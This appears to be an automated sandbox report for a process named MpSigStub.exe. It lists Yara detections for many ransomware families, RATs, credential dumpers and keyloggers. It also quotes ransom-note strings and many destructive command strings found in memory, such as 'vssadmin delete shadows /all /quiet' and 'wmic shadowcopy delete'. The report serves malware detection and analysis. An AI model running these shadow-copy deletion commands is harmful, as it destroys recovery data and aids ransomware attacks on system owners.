Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Clay Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Thanos ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected CryLock ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected OCT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Snatch Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Knot Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Gocoder ransomware

Show sources

Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, type: MEMORY

Yara detected WannaRen ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ryuk ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Zeoticus ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Porn Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected DarkSide Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected HiddenTear ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected WormLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Nephilim Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mailto ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Voidcrypt Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected GoGoogle ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Axiom Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ransomware32

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Artemon Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Covid19 Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected CryptoWall ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cryptolocker ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Marvel Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cute Ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected 0x0M4R Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Amnesia ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Found potential ransomware demand text

Show sources

Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible]
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All]
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /quiet;wmic shadowcopy delete
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: */c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all

Found string related to ransomware

Show sources

Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: &encrypted=

May drop file containing decryption instructions (likely related to ransomware)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: HELP_instructions.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: How to decrypt files.html
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: RESTORE_FILES.txt

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 38.3.MpSigStub.exe.138bd31742c.64.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd21de7c.219.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd21de7c.147.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd223b1a.220.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bcde53e1.182.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be2d6086.59.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd61fbe2.56.unpack, type: UNPACKEDPE	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 38.3.MpSigStub.exe.138be22418a.58.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.210.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bdfb53f6.20.unpack, type: UNPACKEDPE	Matched rule: Metasploit Payloads - file msf.exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138bdfb53f6.75.unpack, type: UNPACKEDPE	Matched rule: Metasploit Payloads - file msf.exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 38.3.MpSigStub.exe.138bd21de7c.196.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138be2d6086.53.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd51435e.70.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd1720c9.183.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 38.3.MpSigStub.exe.138bd223b1a.148.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138be22418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.197.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd1d8af6.146.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd1720c9.207.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd16fc75.208.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138be2d6086.218.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd16fc75.184.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138bd21de7c.209.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: korlia Author: Nick Hoffman
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138bd025981.88.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 38.3.MpSigStub.exe.138bd31742c.64.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: korlia Author: Nick Hoffman
